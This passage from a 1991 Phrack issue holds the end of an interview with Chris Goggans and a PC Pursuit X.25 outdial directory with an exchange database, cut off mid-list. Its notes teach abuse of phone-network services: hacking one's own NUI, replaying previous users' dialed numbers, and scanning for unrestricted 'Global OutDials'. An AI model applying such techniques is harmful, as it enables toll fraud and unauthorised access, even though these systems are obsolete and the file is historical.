          In the present tense, I feel that the public is entitled only to
          information in the public domain.  Information not available legally
          through normal channels is just going to have to be left at that.

ISPNews:  Do you believe that software should always be in the public
domain.?

     CG: No, I do not.  If I wrote something as wonderful as Lotus, or any of
          the Microsoft programs, or Windows, I would want people to pay for
          them.

ISPNews:  Then you do believe in private ownership of and protection for
          software?

     CG:  Yes, definitely.

ISPNews:  What are you views on current U.S.  Computer crime laws?

     CG:  I think that the current laws are too broad.  They do not make
          distinctions between various types of computer crimes.  I consider
          breaking into a computer akin to trespassing.  If someone simply
          walks across my lawn, I might be upset because they trampled my
          grass, but I would leave it at that.  If someone drives across my
          lawn and leaves big trenches, and then comes over and kicks down my
          rosebush, well that's another thing.  Then, if someone drives up my
          steps, goes through my house, through my kitchen, steals all my
          silverware, and then leaves, that's something completely different.
          And while these physical representations of trespassing can't be
          applied directly to an electronic format, distinctions are still
          necessary.

ISPNews: And the present computer crime laws do not make these distinctions?

     CG: I am no lawyer, but from my understanding they do not.  They need to
          be brought into focus.

ISPNews: If they were brought into the kind of focus you suggest, would they
          be fair and equitable?

     CG: Definitely, depending on the punishment that went along with them.  I
          don't think that people who own and operate computer systems would
          view someone who has logged into their system using a guest account
          that was deliberately left with no password to be as serious an
          intrusion as someone who got the system administrator password and
          then went through and deleted all the files.  I don't think that
          simple intrusion would be considered as serious as unauthorized
          penetration along with the wholesale theft and sale to a competitor
          of marketing information, and advertising plans, and financial
          projections for the next quarter.

ISPNews:  What are your views on security training for users?

     CG: People need to be taught what the computer operating system is and
          how it works.  After that, they need to establish some sort of
          channel by which information can be transmitted to others. Direct
          physical contact between communicating parties, covered by official,
          standard company procedures, is the best way to do this.

          People need to be aware that their account, no matter the level of
          importance, is a link in a chain that makes up the security of the
          system.  Information from one account can be used as a springboard to
          other, more powerful accounts.  All users within a network must
          understand that their information is just as important in the
          security chain as is that of the next person.

ISPNews: Given where you are coming from, why should a potential client trust
          you?

     CG: I know that is a natural question.  Just the very nature of creating
          a company should project an image that we are trying to come out of
          the shadows, out of the underground.  We are saying, "Look everybody,
          we've been doing this for a long time, now we want to help.  We have
          11 years of working information about how people compromise existing
          security, and we can help with your particular situation."

ISPNews: I am sure that you understand the natural suspicion that people have.

     CG:  No, that's what I don't understand.  If we at Comsec were out to
          compromise information from an existing company's computer network,
          we wouldn't have incorporated.  We could have done that, and someone
          else out there probably has already done so.  Then the information
          would be available to from one hacker to another.

ISPNews: Are you suggesting there is no system out there that you can't break
          into?

     CG: No, I'm not suggesting that.  But I am saying the vast majority can
          be penetrated.

ISPNews:  Which system is easiest to crack; and which is most difficult?

     CG:  It is hard to say which system is more inherently penetrable than
          another.  From the initial log-in, it's not the operating system;
          rather it's the system's operating environment that is the problem.
          Users may not have addressed security measures.  Certain types of
          security holes may not have been closed.  That's where a technical
          background comes into play: to understand the way the applications
          work; how different systems are accessed; to close holes in the
          system which have become apparent.  You have to deal with human
          factors and technical issues.  You must understand the way the
          computer works and the way programs are run.

ISPNews:  What is the best way to foil hackers?

     CG: It depends on the hacker.  There are different types.  Some people
          hack with modems.  The casual hacker may just stumble across your
          particular computer system, and may be foiled with something as
          simple as good external security.  He may be turned off by physical
          security devices such as a call-back modem, some sort of code access,
          or smart card.

          These measures will not stop a serious hacker who is after your
          company specifically.  In this case, you have to beef up security,
          and take additional steps to ensure the safety of your computer.  And
          you must make certain that security on the inside is as tight as on
          the outside.

ISPN Editor's Note:  Chris Goggans will respond, in every other issue of
                     ISPNews, to your questions on hacking computer systems.
                     His answers promise to be problem-solving, interesting,
                     and even entertaining.  We invite you to write Chris c/o:

                     "Hackers' Mailbag"
                     ISPNews
                     498 Concord Street
                     Framingham, MA  01701-2357
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                Volume Three, Issue Thirty-five, File 4 of 13

                                Amadeus Presents
 //////////////////////////////////////\\\\\\\\\\\\\\\\\\
<<<<<<<<<<<<<  TELENET/SPRINTNET'S PC PURSUIT OUTDIAL DIRECTORY >>>>>>>>>>>
 \\\\\\\\\\\\\\\\\\\////////////////////////////////////
                                October 25, 1991

Area
Code  City, State U.S.A.              300 bps      1200 bps     2400 bps
--- --------------------------------- ------------ ------------ ------------
201 Newark, New Jersey                311020100001 311020100301 311020100022
    NJNEW                                2011         201301       20122
202 Washington, D.C.                  311020200115 311020200116 311020200117
    DCWAS                                202115       202116       202117
203 Hartford, Connecticutt            311020300120 311020300121 311020300105
    CTHAR                                203120       203121       203105
206 Seattle, Washington               311020600205 311020600206 311020600208
    WASEA                                206205       206206       206208
212 New York, New York                311021200315 311021200316 311021200412
    NYNYO                                212315       212316       212412
                                                               311021200028
                                                                   21228
213 Glendale, California              Same as 818,see 818's NUAs & addresses
    CAGLE                                       (Dial 1213+number)
213 Los Angeles, California                        311021300412 311021300413
    CALAN                                             213412       213413
                                                   311021300103 311021300023
                                                      213103       21323
213 Santa Ana, California             Same as 714,see 714's NUAs & addresses
    CASAN                                       (Dial 1213+number)
214 Dallas, Texas                     311021400117 311021400118 311021400022
    TXDAL                                214117       214118       21422
215 Philadelphia, Pennsylvania        311021500005 311021500112 311021500022
    PAPHI                                2155         215112       21522
216 Cleveland, Ohio                   311021600020 311021600021 311021600120
    OHCLE                                21620        21621        216120
301 Washington, D.C.                  Same as 202,see 202's NUAs & Addresses
    DCWAS                                       (Dial 1301+number)
303 Denver, Colorado                  311030300114 311030300115 311030300021
    CODEN                                303114       303115       30321
305 Miami, Florida                    311030500120 311030500121 311030500122
    FLMIA                                305120       305121       305122
312 Chicago, Illinois                 311031200410 311031200411 311031200024
    ILCHI                                312410       312411       31224
313 Ann Arbor, Michigan                No 300 bps
    MIAAR                                access
313 Detroit, Michigan                 311031300214 311031300216 311031300024
    MIDET                                313214       313216       31324
314 St. Louis, Missouri               311031400020 311031400021 311031400005
    MOSLO                                31420        31421        3145
317 Indianapolis, Indiana              No 300 bps
    ININD                                access
404 Atlanta, Georgia                  311040400113 311040400114 311040400022
    GAATL                                404113       404114       40422
407 Miami, Florida                    Same as 305,use 305's NUAs & addresses
    FLMIA                                       (Dial 1407+number)
407 Orlando, Florida                   No 300 bps
    FLORL                                access
408 San Jose, California              311040800110 311040800111 311040800021
    CASAN                                408110       408111       40821
412 Pittsburgh, Pennsylvania           No 300 bps
    PAPIT                                access
414 Milwaukee, Wisconsin              311041400020 311041400021 311041400120
    WIMIL                                41420        41421        414120
415 Oakland, California               311041500108 311041500109 311041500224
    CAOAK                                415108       415109       415224
415 Palo Alto, California             311041500108 311041500011 311041500005
    CAPAL                                415108?      41511        4155?
415 San Francisco, California         311041500215 311041500217 311041500217
    CASFA                                415215       415217       415217?
415 San Jose, California              Same as 408,use 408's NUAs & addresses
    CASJO                                       (Dial 1415+number)
503 Portland, Oregon                  311050300020 311050300021
    ORPOR                                50320        50321
504 New Orleans, Louisiana             No 300 bps
    LANOR                                access
512 Austin, Texas                      No 300 bps
    TXAUS                                access
516 Hempstead, New York                No 300 bps  311051600014
    NYHEM                                access       51614
516 New York, New York                Same as 212,use 212's NUAs & addresses
    NYNYO                                       (Dial 1516+number)
601 Memphis, Tennessee                Same as 901,use 901's NUAs & addresses
    TNMEM                                       (Dial 1601+number)
602 Phoenix, Arizona                  311060200020 311060200021
    AZPHO (Some 602 numbers require      60220        60221
           1602+number, see exchange  311060200022 311060200023 311060200026
           database below)               60222        60223        60226
612 Minneapolis, Minnesota            311061200120 311061200121 311061200022
    MNMIN                                612120       612121       61222
614 Columbus, Ohio                     No 300 bps
    OHCOL                                access
617 Boston, Massachusetts             311061700311 311061700313 311061700026
    MABOS                                617311       617313       61726
618 St. Louis, Missouri               Same as 314,use 314's NUAs & addresses
    MOSLO                                       (Dial 1618+number)
619 San Diego, California
    CASDI
703 Washington, D.C.                  Same as 202,use 202's NUAs & addresses
    DCWAS                                       (Dial 1703+number)
708 Chicago, Illinois                 Same as 312,use 312's NUAs & addresses
    ILCHI                                       (Dial 1708+number)
713 Houston, Texas                    311071300113 311071300114 311071300024
    TXHOU                                713113       713114       71324
714 Colton, California                311071400119 311071400121 311071400102
    CACOL                                714119       714121       714102
714 Santa Ana, California             311071400023 311071400024 311071400021
    CASAN                                71423        71424        71421
                                      311071400210 311071400213 311071400004
                                         714210       714213       7144
718 New York, New York                Same as 212,use 212's NUAs & addresses
    NYNYO                                       (Dial 1718+number)
801 Salt Lake City, Utah              311080100020 311080100021 311080100012
    UTSLC                                80120        80121        80112
813 Tampa, Florida                    311081300020 311081300021 311081300124
    FLTAM                                81320        81321        813124
815 Chicago, Illinois                 Same as 312,use 312's NUAs & addresses
    ILCHI                                       (Dial 1312+number)
816 Kansas City, Missouri             311081600104 311081600221 311081600113
    MOKCI                                816104       816221       816113
817 Dallas, Texas                     Same as 214,use 214's NUAs & addresses
    TXDAL                                       (Dial 1817+number)
818 Glendale, California                           311081800021
    CAGLE                                             81821
818 Los Angeles, California           Same as 213,use 213's NUAs & addresses
    CALAN                                       (Dial 1818+number)
901 Memphis, Tennessee                 No 300 bps
    TNMEM                                access
908 New Brunswick, New Jersey          No 300 bps
    NJNBR                                access
908 Newark, New Jersey                Same as 201,use 201's NUAs & addresses
    NJNEW                                       (Dial 1908+number)
913 Kansas City, Missouri             Same as 816,use 816's NUAs & addresses
    MOKCI                                       (Dial 1913+number)
914 New York, New York                Same as 212,use 212's NUAs & addresses
    NYNYO                                       (Dial 1914+number)
916 Sacramento, California            311091600011 311091600012 311091600007
    CASAC                                91611        91612        9167
919 Research Triangle Park,N Carolina 311091900020 311091900021 311091900124
    NCRTP                                91920        91921        919124

KEY: NUA (X.25 International Inter-Network User Address)------>311012300456
     Sprintnet/Telenet's Intra-network address --------------->    123456

PC Pursuit Outdial City/Area Code Cross Reference Directory
-----------------------------------------------------------

Ann Arbor, Michigan               313  New Brunswick, New Jersey        908
Atlanta, Georigia                 404  New Orleans, Louisiana           504
Austin, Texas                     512  New York, New York  212,516,718 &914
Boston, Massachusetts             617  Newark, New Jersey          201 &908
Chicago, Illinois      312, 708 & 815  Oakland, California              415
Cleveland, Ohio                   216  Orlando, Florida                 407
Colton, California                714  Palo Alto, California            415
Columbus, Ohio                    614  Philadelphia, Pennsylvania       215
Dallas, Texas               214 & 817  Phoenix, Arizona                 602
Denver, Colorado                  303  Pittsburgh, Pennsylvania         412
Detroit, Michigan                 313  Portland, Oregon                 503
Glendale, California        213 & 818  Research Triangle Park,N Carolina919
Hartford, Connecticutt            203  Sacramento, California           916
Hempstead, New York               516  Salt Lake City, Utah             801
Houston, Texas                    713  San Diego, California            619
Indianapolis, Indiana             317  San Francisco, California        415
Kansas City, Missouri       816 & 913  San Jose, California        408 &415
Los Angeles, California     213 & 818  Santa Ana, California       213 &714
Memphis, Tennessee          601 & 901  Seattle, Washington              206
Miami, Florida              305 & 407  St. Louis, Missouri         314 &618
Milwaukee, Wisconsin              414  Tampa, Florida                   813
Minneapolis, Minnesota            612  Washington, D.C.       202, 301 &703

Preface
-------

The PC Pursuit outdials, although limited in their dialing range, are of
fundamental knowledge to any X.25 hacker in the world.  Collecting the
addresses of the PC Pursuit outdials is among the first projects of any
hacker new to the X.25 hacking arena.  On and off through the years since
1986 when I first happened upon the X.25 scene, I have been attempting to
compile the complete list of NUAs for all of the outdials.  I still haven't
realized this goal five years later, as can be evidenced by blanks in the
above list.

Other outdials, such as the ones hacked out of explorations of internal
corporate, government, or educational networks, come and go usually as fast
as codes.  Some of these outdials are prize finds that can dial any number
in the world and would supplant the usefulness of this list.  But such out-
dials are normally gone in a matter of weeks.  The ones that do stay around
(such as the infamous 30209160xxxx global outdials) do not work very well.
Of course there are exceptions to every rule.  Some Global OutDials (GODs)
go on working for years, but only because they are known only by one or a
few hackers who don't go around giving it to everyone in hackerdom far and
wide.

The PC Pursuit outdials have been functioning without fail for several years
and will continue to be a reliable and useful hacker's tool for the foreseeable
future.  You can count on them to be there when you need them, especially when
a GOD you've been using fails and you need something to fall back on. I have
put together these two files to help further facilitate your use of the PC
Pursuit outdials.  I hope you find them useful references.

Some Notes for Beginners
------------------------

All the modems that you access on the outdials are of the Racal-Vadic brand
and accept the standard Hayes AT command set as a default.  I will not go
into an explanation of AT commands since you should already know them as a
competent user of your computer and modem.  If not, check your modem's
manual since it is almost certainly a Hayes compatible modem.

The Racal-Vadic modem offers its own command mode as an alternative to the
industry standard Hayes AT command set.  To access the Racal-Vadic mode, type a
CTRL-E and then RETURN.  You will see "READY" and an asterisk for a prompt.
Type "?" for a list of commands.  This mode is more attractive to many users
because of its verbose interface and detailed call progress messages; because
fewer keystrokes are needed to execute commands such as dial, and because of
its ability to redial up to nine times until a connection is made.

None of the outdials allow you to call them collect.  You will have to call
them from either a PAD (Packet Assembler Deassembler) or NUI (Network User
ID).  PC Pursuit IDs can also be used as pseudo-NUIs by typing the NUA
followed by a comma, the PCP ID, another comma, and the PCP Password.  If
you do not already have one, you will have to consult a fellow hacker for a
valid NUI or PAD (not as freely traded nowadays).  Or, to really impress
your hacker friends, hack your own. (Consult other files featured in Phrack
that deal with this subject matter.)

The 12 digit NUA (Network User Address) for each outdial above is for accessing
the outdial from a network other than SprintNet/Telenet.

The shorter five to six digit number below it is for accessing the outdial
from SprintNet/Telenet.  Actually, you can use the 12 digit number as well
as the shorter five to six digit number (if you precede the 12 digit NUA
with a 0) on SprintNet, but the shorter one is easier to remember and use.

For the purposes of memorizing the outdials that you will use more often, it is
a simple matter of remembering the shorter SprintNet address and convert- ing
it to the 12 digit NUA as needed like this:

SprintNet address xxxyyy becomes 3110xxx00yyy (Add 0's in yyy where needed)
EXAMPLE:          813124 becomes 311081300124
EXAMPLE2:         4155   becomes 311041500005 (Add preceding 0's in yyy)

Note that networks usually require you to precede the NUA with a 0 or 1
(usually 0) much like when you dial a long distance phone call.  For
example, on Tymnet, typing an NUA does not require a 0 or 1.  On Canada's
DataPac, a 1 is required before the 12 digit NUA.  On SprintNet and most
European X.25 networks, a 0 is needed.

When you connect with an outdial modem, the first thing you might want to
do is to redial the last number dialed.  The last person who used the modem
might have called a number that would be of interest to you in your hacking
endeavors.  Enter the Racal-Vadic mode and execute the "R" redial command.
The last number dialed is shown on the screen and dialed.  The A/ command
in the Hayes AT command mode won't work for this purpose since the last
number dialed is not shown and the last command executed isn't necessarily a
dialing command.

Unfortunately, when a person exits the outdial, the modem resets itself in
most cases and the last number dialed is lost.  But occasionally you'll get
lucky and find an interesting new number to call

Calling Specific Modems, and GODs (Global OutDials)
---------------------------------------------------

Each outdial has many modems that you can connect to.  When calling the
outdial NUA, you will be connected to the first available modem.  If all
are being used, you will get a busy message.  It is possible for you to
attempt to connect to one particular modem in the series rather than
connect to the first available unused modem.

Append two digits to the end of a NUA to specify which modem you want.
For example, to connect to the third modem on 311061200022, you would
call NUA 31106120002203.  So theoretically, you can call up to 99
different modems on the same outdial (31106120002200 is the same as
311061200022), but no outdials have this many modems.

On SprintNet, you can append a letter to the four to six digit address
to specify a modem.  You can also add a decimal point and then the two
digits for modems above 26 (and below).  For example, 31106120002203 is
the same as 61222C and 61222.03; 31108130012426 is the same as 813124Z
and 813124.26.

So, you may ask, why would I want to call a specific modem?

The reason is that some modems permit unrestrictive dialing.  Such modems
will let you dial ANY number in the world, not just the local numbers
that you're only suppose to call.  Such modems are known as GODs, which
stands for Global OutDial.

GODs don't last forever.  As soon as the SprintNet priests discover the
abuse occurring on a particular modem, they'll fix it.  So you'll have to
talk with your fellow hackers to find out which modems are known to be
GODs, or better yet, scan for your own.

Local Exchange Database
-----------------------

For those using the outdials from international locations, it is important
to note that you cannot call just any number in the same area code as the 
outdial.  Unless you're using a GOD (see part A), you can only dial numbers
local to the city the outdial is in.

At the end of this file you will find a database of all the exchanges (the
three numbers in a telephone number after the area code) that are dial-able
from each outdial.  This database will not only be useful to verify for sure
that you can dial a particular number from a PC Pursuit outdial, but will also
be useful for checking which outdial to use in cases where multiple outdials
can be used to dial different numbers in the same area code.  For example you
can dial numbers in area code 213 from THREE different outdials: 213 CALAN, 818
CAGLE, *and* 714 CASAN.  Unless you are familiar with the geographic dialing
plan of the Los Angeles area, you would have to consult the exchange database
to figure out which outdial to use.

The raw data for the list was downloaded from the PC Pursuit Service BBS
(call collectable from SprintNet at 311090900631, @C PURSUIT or @909631;
logon as "Sprint Guest" with password "outdial").  I made some very time
consuming modifications to the format of the list so that it could be used
effectively with Unix's grep command or MS-DOG's FIND command (and similar
commands on other operating systems).

For example, let's say you wanted to call a BBS at 213-395-0221.  As I
mentioned earlier, there are three different outdials that can dial numbers in
the 213 area code.  You have to find out which one to use.  On Unix, you would
type:

% grep 213 <filename>|grep 395

Or on MS-DOS, you would type:

C:>FIND "213" <filename>|FIND "395"

where <filename> is the name this file is saved under.  You will then see:
 OB
1 213 CAGLE 393 394 395 396 399 400 413 415 450 451 452 453 454 455 458
  213 CALAN 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400

As you can see, you can call 1-213-395-0221 from two outdials: CAGLE and
CALAN.  But notice that the CAGLE outdial has a 1 in front of it.  This
means that if you use the CAGLE outdial, you will have to dial with the
toll prefix (1) and area code preceding the local number since CAGLE is
in the 818 area code.

Dialing from CAGLE: ATDT12133950221
Dialing from CALAN: ATDT3950221

The Database
------------

  602 AZPHO 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234
  602 AZPHO 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249
  602 AZPHO 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264
  602 AZPHO 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279
  602 AZPHO 280 285 320 331 336 340 345 350 351 352 370 371 375 376 377
  602 AZPHO 379 381 382 389 390 391 392 393 395 396 397 412 420 423 431
  602 AZPHO 433 434 435 436 437 438 439 440 441 443 450 451 460 461 464
  602 AZPHO 468 470 481 482 483 484 486 490 491 493 494 495 496 497 498
  602 AZPHO 528 530 531 534 540 542 543 545 547 548 549 551 553 554 563
  602 AZPHO 585 588 589 596 597 598 630 631 640 641 644 649 650 661 678
  602 AZPHO 681 693 730 731 732 752 756 759 784 786 788 789 820 821 827
  602 AZPHO 829 830 831 832 833 834 835 838 839 840 841 842 843 844 846
  602 AZPHO 848 849 852 853 856 860 861 862 863 864 866 867 869 870 872
  602 AZPHO 873 876 877 878 879 890 891 892 893 894 895 897 898 899 921
  602 AZPHO 924 925 926 929 930 931 932 933 934 935 936 937 938 939 940
  602 AZPHO 941 942 943 944 945 946 947 948 949 951 952 953 954 955 956
  602 AZPHO 957 961 962 963 964 965 966 967 968 969 970 971 972 973 974
  602 AZPHO 975 977 978 979 980 981 985 986 990 991 992 993 994 995 996
  602 AZPHO 997 998
1 602 AZPHO 566 583 584 546 492 561 581 582 780 569 586 471 837 373 380
1 602 AZPHO 983 982 984 986 983 671 987 988
  714 CACOL 275 276 335 350 351 352 353 354 355 356 357 358 359 360 369
  714 CACOL 370 381 382 383 384 386 387 422 431 602 681 682 683 684 685
  714 CACOL 686 687 688 689 749 780 781 782 783 784 785 787 788 789 790
  714 CACOL 791 792 793 794 795 796 797 798 799 820 822 823 824 825 829
  714 CACOL 872 873 874 875 876 877 880 881 882 883 884 885 886 887 888
  714 CACOL 889
1 213 CAGLE 201 202 203 204 205 221 222 223 224 225 226 227 228 229 230
1 213 CAGLE 236 237 238 239 245 250 251 252 253 254 255 256 257 258 259
1 213 CAGLE 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284
1 213 CAGLE 285 286 287 288 289 303 310 314 315 319 340 341 342 343 345
1 213 CAGLE 347 351 353 362 380 381 382 383 384 385 386 387 388 389 392
1 213 CAGLE 393 394 395 396 399 400 413 415 450 451 452 453 454 455 458
1 213 CAGLE 459 460 461 462 463 464 465 466 467 468 469 480 481 482 483
1 213 CAGLE 484 485 486 487 488 489 520 550 551 552 553 556 557 558 559
1 213 CAGLE 573 580 612 613 614 617 619 620 621 622 623 624 625 626 627
1 213 CAGLE 628 629 650 651 652 653 654 655 656 657 658 659 660 661 662
1 213 CAGLE 663 664 665 666 667 668 669 680 681 682 683 684 686 687 688
1 213 CAGLE 689 714 730 731 732 733 734 735 736 737 738 739 740 741 742
1 213 CAGLE 743 744 745 746 747 748 749 765 785 828 829 836 837 838 839
1 213 CAGLE 840 841 842 849 850 851 852 854 855 856 857 858 859 870 871
1 213 CAGLE 872 873 874 875 876 877 878 879 891 892 893 894 895 896 912
1 213 CAGLE 913 930 931 932 933 934 935 936 937 938 939 955 960 962 963
1 213 CAGLE 964 965 966 967 968 969 972 974 975 977
  818 CAGLE 200 240 241 242 243 244 246 247 248 249 301 303 304 350 351
  818 CAGLE 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366
  818 CAGLE 367 368 370 371 372 373 374 375 376 377 378 379 381 382 393
  818 CAGLE 397 398 399 400 401 402 403 404 405 406 409 440 441 442 443
  818 CAGLE 444 445 446 447 448 449 450 459 500 501 502 503 504 505 506
  818 CAGLE 507 508 509 528 542 545 546 547 548 560 564 565 566 567 568
  818 CAGLE 569 574 575 577 578 579 580 584 753 754 760 761 762 763 764
  818 CAGLE 765 766 767 768 769 777 780 781 782 783 784 785 786 787 788
  818 CAGLE 789 790 791 792 793 794 795 796 797 798 799 818 821 831 840
  818 CAGLE 841 842 843 845 846 847 848 890 891 892 893 894 895 896 897
  818 CAGLE 898 899 901 902 903 904 905 906 907 908 909 951 952 953 954
  818 CAGLE 955 956 957 972 980 981 982 983 984 985 986 987 988 989 990
  818 CAGLE 994 995 997
  213 CALAN 200 201 202 203 204 205 206 207 208 209 212 214 215 216 217
  213 CALAN 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233
  213 CALAN 234 235 236 237 238 239 241 245 248 249 250 251 252 253 254
  213 CALAN 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269
  213 CALAN 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284
  213 CALAN 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299
  213 CALAN 300 301 302 303 304 305 306 307 308 309 310 312 313 314 315
  213 CALAN 316 318 319 320 321 322 323 324 327 328 329 330 331 
  213 CALAN 334 335 336 337 338 340 341 342 343 345 347 351 353 362 370
  213 CALAN 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385
  213 CALAN 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400
  213 CALAN 402 404 406 408 410 412 413 414 415 416 417 418 419 440 442
  213 CALAN 443 444 445 446 447 450 451 452 453 454 455 458 459 460 461
  213 CALAN 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476
  213 CALAN 477 478 479 480 481 482 483 484 485 486 487 488 489 500 512
  213 CALAN 515 516 520 527 531 532 533 535 536 537 538 540 541 542 543
  213 CALAN 544 545 546 550 551 552 553 554 556 557 558 559 560 561 562
  213 CALAN 563 564 565 566 567 568 569 573 574 578 580 581 582 583 584
  213 CALAN 585 586 587 588 589 600 601 602 603 604 605 606 607 608 609
  213 CALAN 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626
  213 CALAN 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641
  213 CALAN 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656
  213 CALAN 657 658 659 660 661 662 663 664 665 666 667 668 669 670 671
  213 CALAN 672 673 674 675 676 677 678 679 680 681 682 683 684 685 686
  213 CALAN 687 688 689 692 693 695 696 698 699 700 702 703 712 713 714
  213 CALAN 715 716 717 718 719 720 721 722 723 724 725 726 727 728 729
  213 CALAN 730 731 732 733 734 735 736 737 738 739 740 741 742 743 744
  213 CALAN 745 746 747 748 749 750 751 752 753 754 755 756 757 758 759
  213 CALAN 760 761 762 763 764 765 769 770 771 772 773 774 775 776 777
  213 CALAN 778 779 780 781 782 783 785 791 794 801 802 803 804 806 807
  213 CALAN 809 812 813 814 819 820 821 822 823 824 825 826 827 828 829
  213 CALAN 836 837 838 839 840 841 842 846 849 850 851 852 854 855 856
  213 CALAN 857 858 859 860 861 862 863 864 865 866 867 868 869 870 871
  213 CALAN 872 873 874 875 876 877 878 879 881 887 888 889 891 892 893
  213 CALAN 894 895 896 903 904 907 908 912 913 920 921 922 923 924 925
  213 CALAN 926 927 928 929 930 931 932 933 934 935 936 937 938 939 940
  213 CALAN 941 942 944 945 946 948 949 955 960 962 963 964 965 966 967
  213 CALAN 968 969 970 971 972 973 974 975 977 978 979
1 818 CALAN 200 240 241 242 243 244 246 247 280 281 282 284 285 286 287
1 818 CALAN 288 289 300 301 302 303 307 308 309 350 357 358 359 401 402
1 818 CALAN 409 442 443 444 445 446 447 448 450 451 457 458 459 500 502
1 818 CALAN 507 529 545 546 547 548 570 571 572 573 574 575 576 579 580
1 818 CALAN 805 821 956
  415 CAOAK 200 222 223 227 231 232 233 234 235 236 237 241 243 251 252
  415 CAOAK 253 254 255 256 261 262 263 264 265 267 268 269 271 272 273
  415 CAOAK 274 276 278 279 282 283 284 285 287 291 292 295 296 297 298
  415 CAOAK 302 339 346 351 352 357 362 374 376 385 391 392 393 394 395
  415 CAOAK 396 397 398 399 420 421 425 428 430 431 433 434 436 437 441
  415 CAOAK 442 444 445 446 448 451 452 464 465 466 474 477 478 481 482
  415 CAOAK 483 486 495 521 522 523 524 525 526 527 528 529 530 531 532
  415 CAOAK 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547
  415 CAOAK 548 549 550 552 553 554 556 557 558 559 561 562 563 565 567
  415 CAOAK 568 569 576 577 581 582 596 597 620 621 622 624 626 627 631
  415 CAOAK 632 633 635 636 638 639 641 642 643 644 645 647 648 649 652
  415 CAOAK 653 654 655 658 660 667 668 670 673 677 678 695 724 727 729
  415 CAOAK 732 733 736 739 741 743 746 748 749 758 762 763 764 765 768
  415 CAOAK 769 771 772 773 774 775 776 777 781 782 783 784 785 786 788
  415 CAOAK 799 820 821 822 824 826 831 832 834 835 836 837 838 839 840
  415 CAOAK 841 843 845 848 849 860 861 863 864 865 869 874 881 882 884
  415 CAOAK 885 886 887 888 889 891 893 894 895 896 921 922 923 928 929
  415 CAOAK 930 931 932 933 934 935 936 937 938 939 942 943 944 945 946
  415 CAOAK 947 951 953 954 955 956 957 970 971 972 973 974 975 977 978
  415 CAOAK 979 981 982 983 984 985 986 987 989 990 995 996 998 999
  415 CAPAL 226 276 278 321 322 323 324 325 326 327 328 329 335 336 340
  415 CAPAL 341 342 343 344 345 347 348 349 354 358 361 363 364 365 366
  415 CAPAL 367 368 369 371 375 377 378 424 429 438 471 475 481 487 489
  415 CAPAL 490 493 494 496 497 498 537 538 570 571 572 573 574 578 579
  415 CAPAL 581 582 591 592 593 594 595 598 623 637 651 656 657 659 670
  415 CAPAL 683 688 691 694 696 722 723 725 727 732 733 745 770 780 782
  415 CAPAL 783 784 785 786 790 791 792 793 794 795 796 797 851 852 853
  415 CAPAL 854 855 856 857 858 859 881 884 886 887 888 889 926 940 941
  415 CAPAL 948 949 960 961 962 964 965 966 967 968 969
  916 CASAC 278 321 322 323 324 325 326 327 328 329 331 332 334 338 339
  916 CASAC 344 348 349 351 353 355 361 362 363 364 366 368 369 371 372
  916 CASAC 373 381 383 386 387 388 391 392 393 394 395 399 421 422 423
  916 CASAC 424 425 427 428 429 440 441 442 443 444 445 446 447 448 449
  916 CASAC 451 452 453 454 455 456 457 480 481 482 483 484 485 486 487
  916 CASAC 488 489 531 535 537 539 551 552 553 557 567 568 593 631 635
  916 CASAC 636 638 641 643 646 648 649 653 654 657 665 682 683 684 685
  916 CASAC 686 687 688 689 721 722 723 725 726 727 728 729 731 732 733
  916 CASAC 734 736 737 739 745 747 761 762 763 764 765 766 767 768 785
  916 CASAC 852 855 863 920 921 922 923 924 925 927 928 929 933 939 944
  916 CASAC 951 957 961 962 965 966 967 969 971 972 973 974 978 983 985
  916 CASAC 987 988 989 991 992
1 213 CASAN 430 431 433 434 438 439 493 494 498 592 594 596 597 598 797
1 213 CASAN 799 985 987
  714 CASAN 220 228 229 236 239 241 250 251 253 255 256 258 259 261 262
  714 CASAN 265 282 283 285 289 321 322 323 324 325 326 327 328 329 332
  714 CASAN 367 372 373 374 380 385 414 415 418 432 433 441 447 449 455
  714 CASAN 458 472 474 475 476 490 491 494 497 499 502 503 509 513 515
  714 CASAN 516 517 519 520 521 522 523 524 525 526 527 528 529 530 531
  714 CASAN 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546
  714 CASAN 547 548 549 550 551 552 553 554 556 557 558 559 565 566 567
  714 CASAN 568 569 572 579 581 582 583 586 587 588 589 630 631 632 633
  714 CASAN 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648
  714 CASAN 649 650 651 660 662 663 664 665 666 667 668 669 670 671 673
  714 CASAN 675 680 691 692 693 707 708 712 720 721 722 723 724 725 726
  714 CASAN 727 729 730 731 732 733 738 739 740 741 742 743 744 745 746
  714 CASAN 747 748 750 751 752 754 755 756 757 758 759 760 761 762 764
  714 CASAN 768 770 771 772 773 774 775 776 777 778 779 786 821 826 827
  714 CASAN 828 830 831 832 833 834 835 836 837 838 839 840 841 842 843
  714 CASAN 846 847 848 850 851 852 854 855 856 857 858 859 863 870 871
  714 CASAN 879 890 891 892 893 894 895 896 897 898 921 937 938 939 951
  714 CASAN 952 953 954 955 956 957 960 961 962 963 964 965 966 968 969
  714 CASAN 970 971 972 973 974 975 977 978 979 990 991 992 993 994 995
  714 CASAN 996 997 998 999
  619 CASDI 221 222 223 224 225 226 229 230 231 232 233 234 235 236 237
  619 CASDI 238 239 258 260 262 263 264 265 266 267 268 270 271 272 273
  619 CASDI 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288
  619 CASDI 289 290 291 292 293 294 295 296 297 298 299 336 338 390 401
  619 CASDI 404 406 408 412 413 416 417 419 420 421 422 423 424 425 426
